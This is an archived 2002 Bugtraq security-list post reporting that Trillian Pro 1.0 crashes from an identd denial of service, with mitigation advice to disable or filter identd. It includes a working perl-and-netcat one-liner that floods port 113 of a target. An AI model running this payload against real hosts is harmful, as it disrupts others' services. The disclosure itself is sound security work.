[27105] in bugtraq
trillian DoS: trillian 1.0 pro also vulnerable
daemon@ATHENA.MIT.EDU (Jose Nazario)
Wed Sep 18 20:09:11 2002
Date: Wed, 18 Sep 2002 14:08:58 -0400 (EDT)
From: Jose Nazario <jose@monkey.org>
To: bugtraq@securityfocus.com
Message-ID: <Pine.BSO.4.44.0209181406510.6789-100000@naughty.monkey.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
followup to Lance Fitz-Herbert (aka phrizer)'s find earlier today.
trillian pro 1.0 is also vulnerable to the DoS. no need to run C code,
perl and netcat do it:
perl -e 'print "A"x450; print "\n"' | nc <ip> 113
same precautions ... disable (or filter) identd on that host. enjoy.
___________________________
jose nazario, ph.d. jose@monkey.org
http://www.monkey.org/~jose/
